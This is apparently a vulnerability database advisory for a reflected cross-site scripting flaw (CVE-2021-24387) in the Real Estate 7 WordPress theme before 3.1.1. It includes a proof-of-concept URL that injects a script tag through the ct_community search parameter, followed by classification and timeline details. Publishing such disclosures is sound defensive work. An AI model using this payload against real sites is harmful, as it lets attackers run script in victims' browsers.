Real Estate 7 < 3.1.1 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24387 | Theme Vulnerabilities

Description

The theme did not properly sanitise the ct_community parameter in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which can be triggered in both unauthenticated or authenticated user context

Proof of Concept

https://example.com/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain);%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng

Affects Themes

Fixed in 3.1.1

References

CVE

URL

https://contempothemes.com/wp-real-estate-7/changelog/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website

https://ex-mi.ru

Submitter twitter

Verified

Yes

WPVDB ID

27264f30-71d5-4d2b-8f36-4009a2be6745

Timeline

Publicly Published

2021-06-10 (about 4 years ago)

Added

2021-06-10 (about 4 years ago)

Last Updated

2022-01-17 (about 3 years ago)

Other

Published

Title

Published

2025-02-18

Title

Easypromos Plugin < 1.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2023-09-11

Title

Booking Calendar < 9.7.3.1 - Unauthenticated Stored XSS

Published

2024-11-04

Title

Satisfaction Reports from Help Scout <= 2.0.3 - Reflected Cross-Site Scripting

Published

2024-12-05

Title

Shiptimize for WooCommerce <= 3.1.86 - Reflected Cross-Site Scripting

Published

2014-08-01

Title

Duplicate Post 2.5 - options-general.php post Parameter Reflected XSS